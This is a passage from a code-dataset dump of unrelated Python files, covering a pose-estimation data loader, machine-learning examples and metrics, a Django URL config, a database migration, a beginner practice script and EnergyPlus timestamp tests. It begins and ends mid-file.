\"\"\"Process gt 3D keypoints and apply all augmentation transforms.\"\"\"\n # in-plane rotation\n rot_mat = np.eye(3)\n if not r == 0:\n rot_rad = -r * np.pi / 180\n sn,cs = np.sin(rot_rad), np.cos(rot_rad)\n rot_mat[0,:2] = [cs, -sn]\n rot_mat[1,:2] = [sn, cs]\n S[:, :-1] = np.einsum('ij,kj->ki', rot_mat, S[:, :-1]) \n # flip the x coordinates\n if f:\n S = flip_kp(S)\n S = S.astype('float32')\n return S\n\n def pose_processing(self, pose, r, f):\n \"\"\"Process SMPL theta parameters and apply all augmentation transforms.\"\"\"\n # rotation or the pose parameters\n pose[:3] = rot_aa(pose[:3], r)\n # flip the pose parameters\n if f:\n pose = flip_pose(pose)\n # (72),float\n pose = pose.astype('float32')\n return pose\n\n def generate_target(self, 
keypoints):\n '''\n :param joints: [num_joints, 3]\n :param joints_vis: [num_joints, 3]\n :return: target, target_weight(1: visible, 0: invisible)\n '''\n # print(keypoints)\n keypoints_14 = keypoints[25:39,:]\n # keypoints1 = keypoints.copy()\n # keypoints1[:,:2] = (keypoints1[:,:2] + 1) * constants.IMG_RES / 2 - 1\n # keypoints_14 = keypoints1[25:39,:]\n target_weight = np.ones((keypoints_14.shape[0], 1), dtype=np.float32)\n target_weight[:, 0] = keypoints_14[:, 2]\n\n assert self.target_type == 'gaussian', \\\n 'Only support gaussian map now!'\n\n if self.target_type == 'gaussian':\n target = np.zeros((self.num_joints,\n self.heatmap_size[1],\n self.heatmap_size[0]),\n dtype=np.float32)\n\n tmp_size = self.sigma * 3\n\n # print(keypoints)\n\n for joint_id in range(self.num_joints):\n feat_stride = constants.IMG_RES / self.heatmap_size\n # print(feat_stride)\n # print(keypoints_14[joint_id])\n mu_x = int(keypoints_14[joint_id][0] / feat_stride[0] + 0.5)\n mu_y = int(keypoints_14[joint_id][1] / feat_stride[1] + 0.5)\n # print(mu_x)\n # print(mu_y)\n # Check that any part of the gaussian is in-bounds\n ul = [int(mu_x - tmp_size), int(mu_y - tmp_size)]\n br = [int(mu_x + tmp_size + 1), int(mu_y + tmp_size + 1)]\n # print(ul)\n # print(br)\n if ul[0] >= self.heatmap_size[0] or ul[1] >= self.heatmap_size[1] \\\n or br[0] < 0 or br[1] < 0:\n # If not, just return the image as is\n target_weight[joint_id] = 0\n continue\n\n # # Generate gaussian\n size = 2 * tmp_size + 1\n x = np.arange(0, size, 1, np.float32)\n y = x[:, np.newaxis]\n x0 = y0 = size // 2\n # The gaussian is not normalized, we want the center value to equal 1\n g = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * self.sigma ** 2))\n\n # Usable gaussian range\n g_x = max(0, -ul[0]), min(br[0], self.heatmap_size[0]) - ul[0]\n g_y = max(0, -ul[1]), min(br[1], self.heatmap_size[1]) - ul[1]\n # print(g_x)\n # print(g_y)\n # Image range\n img_x = max(0, ul[0]), min(br[0], self.heatmap_size[0])\n img_y = max(0, ul[1]), min(br[1], self.heatmap_size[1])\n # print(img_x)\n # print(img_y)\n v = target_weight[joint_id]\n if v > 0.5:\n target[joint_id][img_y[0]:img_y[1], img_x[0]:img_x[1]] = \\\n g[g_y[0]:g_y[1], g_x[0]:g_x[1]]\n\n if self.use_different_joints_weight:\n target_weight = np.multiply(target_weight, self.joints_weight)\n\n # tt = np.nonzero(target[0])\n # print(np.transpose(tt))\n\n return target, target_weight\n\n def __getitem__(self, index):\n item = {}\n scale = self.scale[index].copy()\n center = self.center[index].copy()\n\n # Get augmentation parameters\n flip, pn, rot, sc = self.augm_params()\n \n # Load image\n # print(self.img_dir)\n # print(type(self.img_dir))\n # print(self.imgname[index])\n # print(type(str(self.imgname[index])))\n\n try: \n imgname = join(self.img_dir, self.imgname[index].decode(\"utf-8\"))\n except:\n imgname = join(self.img_dir, self.imgname[index])\n try:\n img = cv2.imread(imgname)[:,:,::-1].copy().astype(np.float32)\n # print(imgname)\n # print(1111)\n except TypeError:\n print(imgname)\n # print(2222)\n orig_shape = np.array(img.shape)[:2]\n\n # Get SMPL parameters, if available\n if self.has_smpl[index]:\n pose = self.pose[index].copy()\n betas = self.betas[index].copy()\n else:\n pose = np.zeros(72)\n betas = np.zeros(10)\n\n # Process image\n img = self.rgb_processing(img, center, sc*scale, rot, flip, pn)\n img = torch.from_numpy(img).float()\n # Store image before normalization to use it in visualization\n item['img'] = self.normalize_img(img)\n item['pose'] = 
torch.from_numpy(self.pose_processing(pose, rot, flip)).float()\n item['betas'] = torch.from_numpy(betas).float()\n item['imgname'] = imgname\n\n # Get 3D pose, if available\n if self.has_pose_3d:\n S = self.pose_3d[index].copy()\n item['pose_3d'] = torch.from_numpy(self.j3d_processing(S, rot, flip)).float()\n else:\n item['pose_3d'] = torch.zeros(24,4, dtype=torch.float32)\n\n # Get 2D keypoints and apply augmentation transforms\n keypoints = self.keypoints[index].copy()\n # print(keypoints[27])\n item['keypoints'] = torch.from_numpy(self.j2d_processing(keypoints, center, sc*scale, rot, flip)).float()\n # print(item['keypoints'][27])\n item['has_smpl'] = self.has_smpl[index]\n item['has_pose_3d'] = self.has_pose_3d\n item['scale'] = float(sc * scale)\n item['center'] = center.astype(np.float32)\n item['orig_shape'] = orig_shape\n item['is_flipped'] = flip\n item['rot_angle'] = np.float32(rot)\n item['gender'] = self.gender[index]\n item['sample_index'] = index\n item['dataset_name'] = self.dataset\n\n target, target_weight = self.generate_target(item['keypoints'].numpy())\n\n item['target'] = torch.from_numpy(target)\n item['target_weight'] = torch.from_numpy(target_weight)\n\n\n try:\n item['maskname'] = self.maskname[index]\n except AttributeError:\n item['maskname'] = ''\n try:\n item['partname'] = self.partname[index]\n except AttributeError:\n item['partname'] = ''\n\n return item\n\n def __len__(self):\n return len(self.imgname)\n","sub_path":"datasets/base_JointsDataset.py","file_name":"base_JointsDataset.py","file_ext":"py","file_size_in_byte":13541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648418190","text":"import numpy as np\nfrom sklearn import preprocessing\n\n## Label encoding\n# Sample input labels\ninput_labels =['red', 'black', 'red', 'green', 'black', 'yellow', 'white']\n#Create label encoder and fit the labels\nencoder = preprocessing.LabelEncoder()\nencoder.fit(input_labels)\n\n# Print the mapping\nprint(\"\\nLabel mapping:\")\nfor i,item in enumerate(encoder.classes_):\n print(item,\"-->\",i)\n#Encode a set of labels using the encoder\ntest_labels = ['green','red','black']\nencoded_values = encoder.transform(test_labels)\nprint(\"\\nLabels=\",test_labels)\nprint(\"Encoded values=\", list(encoded_values))","sub_path":"LearnArtificialIntelligenceWithPython/Chapter02/Chapter02_02.py","file_name":"Chapter02_02.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450528324","text":"import unittest\nfrom unittest import TestCase\nfrom nn_pruning.patch_coordinator import SparseTrainingArguments, ModelPatchingCoordinator\n\nfrom transformers import AutoConfig, AutoModelForQuestionAnswering\n\nimport copy\n\nclass TestFun(TestCase):\n def helper(self, sparse_args, model_name_or_path):\n config = AutoConfig.from_pretrained(model_name_or_path)\n model = AutoModelForQuestionAnswering.from_pretrained(model_name_or_path)\n\n device = \"cuda\"\n cache_dir = None\n logit_names = [\"start_logits\", \"end_logits\"]\n teacher_constructor = AutoModelForQuestionAnswering\n\n coordinator = ModelPatchingCoordinator(sparse_args, device, cache_dir, model_name_or_path, logit_names, teacher_constructor)\n\n return config, model, coordinator\n\n def test_base(self):\n sparse_args = SparseTrainingArguments.hybrid(20.0)\n sparse_args.layer_norm_patch = True\n sparse_args.gelu_patch = True\n\n ref_stats = {\n \"bert-base-uncased\": {\"main\": 
{\"patched\": 72}, \"layer_norm\": {\"patched\": 25}, \"gelu\": {\"patched\": 12}},\n \"bert-large-uncased\": {\"main\": {\"patched\": 144}, \"layer_norm\": {\"patched\": 49}, \"gelu\": {\"patched\": 24}},\n \"facebook/bart-base\": {\"main\": {\"patched\": 96}, \"layer_norm\": {\"patched\": 32}, \"gelu\": {\"patched\": 12}}\n }\n\n for model_name_or_path in ref_stats.keys():\n config, model, coordinator = self.helper(sparse_args, model_name_or_path)\n\n coordinator.patch_model(model)\n\n stats = copy.deepcopy(coordinator.stats)\n\n print(stats[\"main\"])\n for k in stats:\n del stats[k][\"patched_names\"]\n\n self.assertEqual(stats, ref_stats[model_name_or_path])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"nn_pruning/tests/test_patch2.py","file_name":"test_patch2.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203956325","text":"# Youtube-dl options\nydl_opts = {\n 'quiet': True,\n 'skip_download': True,\n 'forceid': True,\n 'forcetitle': True,\n 'forceurl': True,\n 'forcejson': True,\n 'ignoreerrors': True,\n 'download': False,\n}\n\n# Paths\nnewVideosPath = './data/newVideos.json'\npredResultsPath = './data/predResults.json'\nmodelLRPath = './models/LogisticRegression.pkl.z'\nmodelLGBMPath = './models/LightGBM.pkl.z'\nmodelRFPath = './models/RandomForest.pkl.z'\nTFidVecPath = './models/Vectorizer.pkl.z'\n\n\n# Query filters for collecting data\nbaseQuery = \"ytsearchdate100\"\nqueryFilters = [\"machine+learning\", \"data+science\", \"kaggle\"]\n\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6808819","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sqlite3\nimport pickle\n\nlogdir = os.path.expanduser(\"~\")\nlogdir = os.path.join(logdir, \".tech-parser\")\n\ndef get_similarity(article1, article2):\n\twords1 = get_words(article1['title'])\n\twords2 = get_words(article2['title'])\n\t\n\tlen_all_words = len(words1) + len(words2)\n\tshrd = []\n\tfor word in words1:\n\t\tif word in words2:\n\t\t\tif shrd.count(word) < min(words1.count(word), words2.count(word)):\n\t\t\t\tshrd.append(word)\n\t\n\treturn 2.0 * len(shrd) / len_all_words\n\ndef find_similiar(articles):\n\tinteresting_articles = get_interesting_articles()\n\tsimiliar_articles = []\n\t\n\tfor article in articles:\n\t\tif article in interesting_articles:\n\t\t\tsimiliar_articles.append([article, 0.0])\n\t\t\tcontinue\n\t\t\n\t\tscores = []\n\t\tfor interesting_article in interesting_articles:\n\t\t\tscore = get_similarity(article, interesting_article)\n\t\t\tscores.append(score)\n\t\taverage = sum(scores) / len(scores) if len(scores) > 0 else 0.0\n\t\tif [article, average] not in similiar_articles:\n\t\t\tsimiliar_articles.append([article, average])\n\t\n\treturn similiar_articles\n\ndef get_words(s, exclude=[\"a\", \"an\", \"the\", \"is\"]):\n\ts = s.strip().lower()\n\tr1 = re.compile(r\"(?P\\w+)n['\\u2019]t\", re.UNICODE)\n\tr2 = re.compile(r\"(?P\\w+)['\\u2019]s\", re.UNICODE)\n\tr3 = re.compile(r\"(?P\\w+)['\\u2019]m\", re.UNICODE)\n\tr4 = re.compile(r\"(?P\\w+)['\\u2019]re\", re.UNICODE)\n\tr5 = re.compile(r\"(?P\\w+)['\\u2019]ve\", re.UNICODE)\n\tr6 = re.compile(r\"(?P\\w+)['\\u2019]d\", re.UNICODE)\n\tr7 = re.compile(r\"(?P\\w+)['\\u2019]ll\", re.UNICODE)\n\tr8 = re.compile(u\"[^А-Я^а-я^A-Z^a-z^ ]\", 
re.UNICODE)\n\ts = r1.sub(\"\\g not\", s)\n\ts = r2.sub(\"\\g\", s)\n\ts = r3.sub(\"\\g am\", s)\n\ts = r4.sub(\"\\g are\", s)\n\ts = r5.sub(\"\\g have\", s)\n\ts = r6.sub(\"\\g would\", s)\n\ts = r7.sub(\"\\g will\", s)\n\ts = r8.sub(\"\", s)\n\t\n\twords = s.split(\" \")\n\tfor word in exclude:\n\t\ttry:\n\t\t\twords.remove(word)\n\t\texcept ValueError:\n\t\t\tpass\n\t\n\treturn [word for word in words if word]\n\ndef get_interesting_articles():\n\tsetup_db()\n\tcon = sqlite3.connect(os.path.join(logdir, 'interesting.db'))\n\tcur = con.cursor()\n\tcur.execute('SELECT * FROM interesting_articles;')\n\tres = cur.fetchall()\n\treturn [{'title': x[1],\n\t\t\t'link': x[2],\n\t\t\t'source': x[3]} for x in res]\n\ndef add_article(addr):\n\tf = open(os.path.join(logdir, \"articles_dumped\"), 'rb')\n\tdumped = f.read()\n\tf.close()\n\t\n\tarticles = pickle.loads(dumped)\n\t\n\tfor article in articles:\n\t\tif article[0]['link'] == addr:\n\t\t\tbreak\n\t\n\tadd_to_interesting(article)\n\ndef add_to_interesting(article):\n\tsetup_db()\n\tcon = sqlite3.connect(os.path.join(logdir, 'interesting.db'))\n\tcur = con.cursor()\n\tcur.execute('SELECT count(link) from interesting_articles;')\n\tif cur.fetchone()[0] > 150:\n\t\tcur.execute(\"\"\"DELETE FROM interesting_articles\n\t\t\tWHERE id = (SELECT MIN(id) FROM interesting_articles);\"\"\")\n\ttry:\n\t\tcur.execute(\"\"\"INSERT INTO\n\t\t\tinteresting_articles(title, link, source) VALUES(?, ?, ?);\"\"\",\n\t\t\t(article[0]['title'], article[0]['link'], article[0]['source']))\n\t\tcon.commit()\n\texcept sqlite3.IntegrityError:\n\t\tpass\n\tcon.close()\n\ndef setup_db():\n\tcon = sqlite3.connect(os.path.join(logdir, 'interesting.db'))\n\tcur = con.cursor()\n\tcur.execute(\"\"\"CREATE TABLE IF NOT EXISTS interesting_articles\n\t\t\t(id INTEGER PRIMARY KEY AUTOINCREMENT,\n\t\t\t\ttitle TEXT, link TEXT, source TEXT, UNIQUE(link));\"\"\")\n\tcon.commit()\n\tcon.close()\n","sub_path":"TechParser/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"43648841","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login,logout\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'cmdb.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n #url(r'^login/', 'user_log.views.user_login', name='user login'),\n url(r'^cmdb/', 'cmdb.views.cmdb', name=' cmdb'),\n url(r'^cabinet/', 'cabinet.views.cabinet', name=' cabinet'),\n url(r'^service/', 'services.views.service', name=' service'),\n url(r'^logout/$', 'django.contrib.auth.views.logout',{'template_name':'logout.html'}),\n url(r'^*', 'django.contrib.auth.views.login', {'template_name': 'login.html'}, name='user login'),\n\n)\n","sub_path":"nice_cmdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102410879","text":"import numpy as np\nimport torch.nn as nn\nimport torch\n\n\nclass KNN:\n \"\"\"\n k-nearest neighbor baseline to infer number of visits\n \"\"\"\n\n def __init__(self, k=1, weighted=False, median=False):\n self.k = k\n self.weighted = weighted\n self.median = median\n\n def __call__(self, data):\n \"\"\"\n Get closes feature vector in node_features and use their label\n \"\"\"\n node_features_matrix = data.x\n # only the node features with label <=1 are 
eligible\n        node_features = node_features_matrix[node_features_matrix[:, -1] <= 1]\n        assert len(node_features.shape) == 2\n        # assert that only one batch\n        # assert len(torch.unique(data.batch)) == 1\n        assert len(data.y.shape) == 2\n        new_location_features = data.y[:, :-1]\n\n        feats_wo_labels = node_features[:, :-1]\n        distance_to_feats = torch.mean(\n            (feats_wo_labels - new_location_features) ** 2, axis=1\n        )\n        knn_inds = torch.argsort(distance_to_feats)[: self.k]\n        if self.weighted:\n            knn_dist = distance_to_feats[knn_inds]\n            normed_knn_dist = knn_dist / torch.sum(knn_dist)\n            avg_label = torch.sum(normed_knn_dist * node_features[knn_inds, -1])\n        else:\n            if self.median:\n                avg_label = torch.median(node_features[knn_inds, -1])\n            else:\n                avg_label = torch.mean(node_features[knn_inds, -1])\n        return avg_label\n","sub_path":"predict_visits/baselines/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"647606262","text":"import abc\n\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score, confusion_matrix, mean_absolute_error, mean_squared_error, precision_score\nfrom sklearn.model_selection import cross_val_predict, cross_val_score\n\nfrom visualization import plot_confusion_matrix\n\n\nclass BaseModel:\n\n    def __init__(self):\n        self.model = None\n\n    @abc.abstractmethod\n    def train(self, features, targets):\n        print('%s training...' % self.__class__.__name__)\n\n    @abc.abstractmethod\n    def predict(self, features):\n        print('%s predict...' % self.__class__.__name__)\n\n    @abc.abstractmethod\n    def predict_prob(self, features):\n        print('%s predict_prob...' % self.__class__.__name__)\n\n    @abc.abstractmethod\n    def predict_log_prob(self, features):\n        print('%s predict_prob...' % self.__class__.__name__)\n\n    @abc.abstractmethod\n    def accuracy_score(self, features, targets):\n        print('%s accuracy_score...' % self.__class__.__name__)\n\n    def cross_val_score(self, features, targets, cv):\n        print('%s cross_val_score...' % self.__class__.__name__)\n        scores = cross_val_score(self.model, X=features, y=targets, cv=cv)\n        print('cross_val_score results:\\n %s' % scores)\n        return scores\n\n    def cross_val_predict(self, features, targets):\n        print('%s cross_val_predict...' % self.__class__.__name__)\n        scores = cross_val_predict(self.model, X=features, y=targets)\n        print('cross_val_predict results:\\n%s' % scores)\n        return scores\n\n    def metrics_mse(self, y_pred, y_true, sample_weight=None):\n        \"\"\"\n        Weighted mean squared error.\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :param sample_weight: sample weights\n        :return: float\n            Weighted mean squared error.\n        \"\"\"\n        print('%s metrics_mse...' % self.__class__.__name__)\n        result = mean_squared_error(y_true=y_true, y_pred=y_pred,\n                                    sample_weight=sample_weight)\n        return result\n\n    def metrics_mae(self, y_pred, y_true, sample_weight=None):\n        \"\"\"\n        Weighted mean absolute error.\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :param sample_weight: sample weights\n        :return: float\n            Weighted mean absolute error.\n        \"\"\"\n        print('%s metrics_mae...' 
% self.__class__.__name__)\n        result = mean_absolute_error(y_true=y_true, y_pred=y_pred,\n                                     sample_weight=sample_weight)\n        return result\n\n    def metrics_weighted_rmse(self, y_pred, y_true):\n        \"\"\"\n        Compute an RMSE-based score. To reflect the different importance of the\n        predicted classes 0, 1 and 2, errors on classes 1 and 2 are penalized\n        more heavily: the squared errors are weighted by factors of 1, 2 and\n        2.5 respectively when the score is computed.\n        np.average((y_true - y_pred) ** 2, axis=0, weights=weights)\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :return: score\n        \"\"\"\n        weight_dict = {0: 1, 1: 2, 2: 2.5}  # misclassification penalty weight per class\n        weights = [weight_dict[l] for l in y_true]\n        mse = np.average((y_true - y_pred) ** 2, axis=0, weights=weights)\n        score = 1 / (1 + np.sqrt(mse))\n        return score\n\n    def metrics_accuracy(self, y_pred, y_true, sample_weight=None):\n        \"\"\"\n        Accuracy.\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :param sample_weight: sample weights\n        :return: float\n            Accuracy.\n        \"\"\"\n        print('%s metrics_accuracy...' % self.__class__.__name__)\n        result = accuracy_score(y_true=y_true, y_pred=y_pred,\n                                sample_weight=sample_weight)\n        return result\n\n    def metrics_precision(self, y_pred, y_true, sample_weight=None):\n        \"\"\"\n        Precision, averaged over all classes (macro average).\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :param sample_weight: sample weights\n        :return: float\n            Precision.\n        \"\"\"\n        print('%s metrics_precision...' % self.__class__.__name__)\n        result = precision_score(y_true=y_true, y_pred=y_pred,\n                                 average='macro', sample_weight=sample_weight)\n        return result\n\n    def metrics_precision_individual(self, y_pred, y_true):\n        \"\"\"\n        Compute the precision of each class.\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :return: dict\n            Precision per class.\n        \"\"\"\n        print('%s metrics_precision_individual...' % self.__class__.__name__)\n        y_pred, y_true = np.array(y_pred), np.array(y_true)\n        result = {}\n        for label in sorted(set(y_true)):\n            indices = np.argwhere(y_pred == label)\n            correct_num = np.sum(y_true[indices] == label)\n            result[label] = correct_num / len(indices)\n        return result\n\n    def metrics_recall_individual(self, y_pred, y_true):\n        \"\"\"\n        Compute the recall of each class.\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :return: dict\n            Recall per class.\n        \"\"\"\n        print('%s metrics_recall_individual...' % self.__class__.__name__)\n        y_pred, y_true = np.array(y_pred), np.array(y_true)\n        result = {}\n        for label in sorted(set(y_true)):\n            indices = np.argwhere(y_true == label)\n            correct_num = np.sum(y_pred[indices] == label)\n            result[label] = correct_num / len(indices)\n        return result\n\n    def metrics_confusion_matrix(self, y_pred, y_true, labels=None, plot_matrix=False):\n        \"\"\"\n        Confusion matrix.\n        :param y_pred: predicted labels\n        :param y_true: ground-truth labels\n        :param labels: label sequence containing all label classes.\n        :param plot_matrix: whether to plot the confusion matrix\n        :return: confusion matrix, shape=[n_classes, n_classes]\n        \"\"\"\n        print('%s metrics_confusion_matrix...' % self.__class__.__name__)\n        matrix = confusion_matrix(y_true, y_pred, labels)\n        if plot_matrix:\n            plot_confusion_matrix(matrix, labels)\n        return matrix\n\n    def feature_ranking(self, feature_names):\n        importances = self.model.feature_importances_\n        indices = np.argsort(importances)[::-1]\n        # Print the feature ranking\n        print(\"Feature ranking:\")\n        for rank, index in enumerate(indices):\n            print(\"Rank %d: %s (%f)\" % (rank + 1, feature_names[index], importances[index]))\n\n    def save_model(self, path):\n        \"\"\"\n        Persist the model to disk.\n        :param path: save path.\n        \"\"\"\n        print('%s save_model...' % self.__class__.__name__)\n        joblib.dump(self.model, path)\n\n    def load_model(self, path):\n        \"\"\"\n        Load a previously saved model.\n        :param path: path to the saved model.\n        \"\"\"\n        print('%s load_model...' 
% self.__class__.__name__)\n self.model = joblib.load(path)\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504671621","text":"\"\"\"replace url_id by sim_number atribute to sim_tag_user\n\nRevision ID: 2c02f6744c08\nRevises: ae13e1bc1cfe\nCreate Date: 2020-10-28 11:28:48.007949\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '2c02f6744c08'\ndown_revision = 'ae13e1bc1cfe'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('sim_tag_user', sa.Column('sim_number', sa.Integer(), nullable=False))\n op.drop_column('sim_tag_user', 'url_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('sim_tag_user', sa.Column('url_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=False))\n op.drop_column('sim_tag_user', 'sim_number')\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/2c02f6744c08_replace_url_id_by_sim_number_atribute_.py","file_name":"2c02f6744c08_replace_url_id_by_sim_number_atribute_.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"20480150","text":"#!/usr/bin/env python\nimport random\nimport string\nimport os\n\nos.system(\"clear\")\n##########################################################\n# using split\n# test = \"this is a string\"\n# result = \"#\".join(test.split('t'))\n# print(result)\n\n##########################################################\n# lol = int(input(\"give input : \"))\n# print(lol)\n\n# function\n##########################################################\n# def printdef():\n# \tpass\n# list ###################################################\narr = [1, 2, 3, 4, 5, 6]\narr.append([2, 3, 4])\narr.append(\"Adsd\")\nprint(arr)\n#for loop#################################################\nfor n in range(2, 22):\n print(n)\n#\tfor n in range(3):\n# if else#################################################\n#\tif (lol % 2) == 1:\n#\t\tprint(\"odd\")\n#\telif (lol % 2) != 1:\n#\t\tprint(\"even\")\n#\telse:\n#\t\tprint(\"lol\")\n\n# string check condition##################################\nlol = \"asdfdhhjjlm\"\nfor c in lol:\n print(c)\nn = \"d\"\nprint(n in lol)\nprint(n)\n\n# list funtions###########################################\n# a= [1,2,3,4,5,6,7]\n# print(a[1:5])\n# print(a[3:])\n# print(a[:-1])\n\n#while loop ###############################\n# i=1;\n# while i!=6:\n# \ti=input(\"enter number \" )\n\n#calling the function #################################\n\n# x = [1, 2, 3]\n# y = [5, 10, 15]\n# allproducts = [a*b for a in x for b in y] # good stuff\n# print(allproducts)\n# a = (random.sample(range(100),5)) # gives a list of 5 random numbers\n# print(a)\n\n# def get_int():\n# \treturn int(input(\"number ples\"))\n# result = get_int()\n# print(result)\n\n# populating a list\n# item_list =[]\n# def get_list():\n# \treturn(input(\"enter the list \"))\n# for n in range(4):\n# \titem_list.append(get_list())\n\n# print(item_list[0],item_list[len(item_list)-1]) # returns last and first of the list\n# printdef() # calling the functuion\n\n# fabonaccci\n# def fibonacci():\n# num = int(input(\"How many numbers 
to generate?:\"))\n#     i = 1\n#     if num == 0:\n#         fib = []\n#     elif num == 1:\n#         fib = [1]\n#     elif num == 2:\n#         fib = [1, 1]\n#     elif num > 2:\n#         fib = [1, 1]\n#         while i < (num - 1):\n#             fib.append(fib[i] + fib[i-1])\n#             i += 1\n#     return fib\n\n\n# print(fibonacci())\n# input()\n###########################################################\n# generating random pass\n\n\ndef passGen():\n    pwd = \"qwerty\"\n    # build a 5-character password by sampling from the seed letters and punctuation\n    pwd = \"\".join(random.sample(pwd + string.punctuation, 5))\n    print(pwd)\n\n\n# passGen()\n","sub_path":"python/pyFunct.py","file_name":"pyFunct.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22075132","text":"import pytest\n\nfrom esofile_reader.processing.eplus.esofile_reader import read_file\nfrom esofile_reader.processing.eplus.esofile_time import *\nfrom esofile_reader.processing.eplus.esofile_time import EsoTimestamp\nfrom tests.paths import *\n\n\n@pytest.mark.parametrize(\n    \"year,interval_tuple,expected\",\n    [\n        (2002, EsoTimestamp(1, 1, 0, 0), datetime(2002, 1, 1, 0, 0)),\n        (2002, EsoTimestamp(1, 1, 1, 30), datetime(2002, 1, 1, 0, 30)),\n        (2002, EsoTimestamp(12, 31, 24, 60), datetime(2003, 1, 1, 0, 0)),\n        (2002, EsoTimestamp(10, 31, 24, 60), datetime(2002, 11, 1, 0, 0)),\n        (2002, EsoTimestamp(10, 25, 24, 60), datetime(2002, 10, 26, 0, 0, 0)),\n        (2002, EsoTimestamp(10, 25, 22, 60), datetime(2002, 10, 25, 22, 0, 0)),\n        (2002, EsoTimestamp(10, 25, 22, 10), datetime(2002, 10, 25, 21, 10, 0)),\n    ],\n)\ndef test_parse_eso_timestamp(year, interval_tuple, expected):\n    assert parse_eso_timestamp(year, *interval_tuple) == expected\n\n\n@pytest.mark.parametrize(\n    \"date,interval_tuple,expected\",\n    [\n        (datetime(2002, 1, 1), (2, 3, 4, 30), datetime(2002, 2, 3, 3, 30)),\n        (datetime(2002, 1, 1), (None, 3, 4, 30), datetime(2002, 1, 3, 3, 30)),\n        (datetime(2002, 1, 1), (None, None, 10, 30), datetime(2002, 1, 1, 9, 30)),\n        (datetime(2002, 12, 31), (None, None, 24, 60), datetime(2003, 1, 1, 0, 0)),\n    ],\n)\ndef test_combine_peak_result_datetime(date, interval_tuple, expected):\n    assert combine_peak_result_datetime(date, *interval_tuple) == expected\n\n\ndef test_month_act_days():\n    m_envs = [31, 59, 90, 97]\n    out = get_month_n_days_from_cumulative(m_envs)\n    assert out == [31, 28, 31, 7]\n\n\ndef test_month_act_days_single_env():\n    m_envs = [[31]]\n    out = get_month_n_days_from_cumulative(m_envs)\n    assert out == [[31]]\n\n\ndef test_find_num_of_days_annual():\n    ann_num_days = [1]\n    rp_num_days = [365]\n    out = find_num_of_days_annual(ann_num_days, rp_num_days)\n    assert out == [365]\n\n    ann_num_days = [1, 2]\n    rp_num_days = [700]\n    out = find_num_of_days_annual(ann_num_days, rp_num_days)\n    assert out == [350, 350]\n\n\n@pytest.mark.parametrize(\"year, expected\", [(2020, 366), (2001, 365)])\ndef test_get_num_of_days(year, expected):\n    days = {M: [10, 20, 30], RP: [123], A: [None]}\n    dates = {A: [datetime(year, 1, 1)]}\n    out = get_n_days_from_cumulative(days, dates)\n    assert out == {\"monthly\": [10, 10, 10], \"runperiod\": [123], \"annual\": [expected]}\n\n\n@pytest.mark.parametrize(\n    \"first_step_data,current_step_data,increment\",\n    [\n        (EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 1, 0, 0), True),\n        (EsoTimestamp(2, 1, 0, 0), EsoTimestamp(1, 1, 0, 0), True),\n        (EsoTimestamp(1, 1, 1, 0), EsoTimestamp(12, 31, 24, 60), False),\n        (EsoTimestamp(1, 1, 1, 0), EsoTimestamp(1, 1, 1, 0), True),\n    ],\n    ids=[\"monthly\", \"monthly\", \"daily\", \"daily\"],\n)\ndef test_increment_year(first_step_data, 
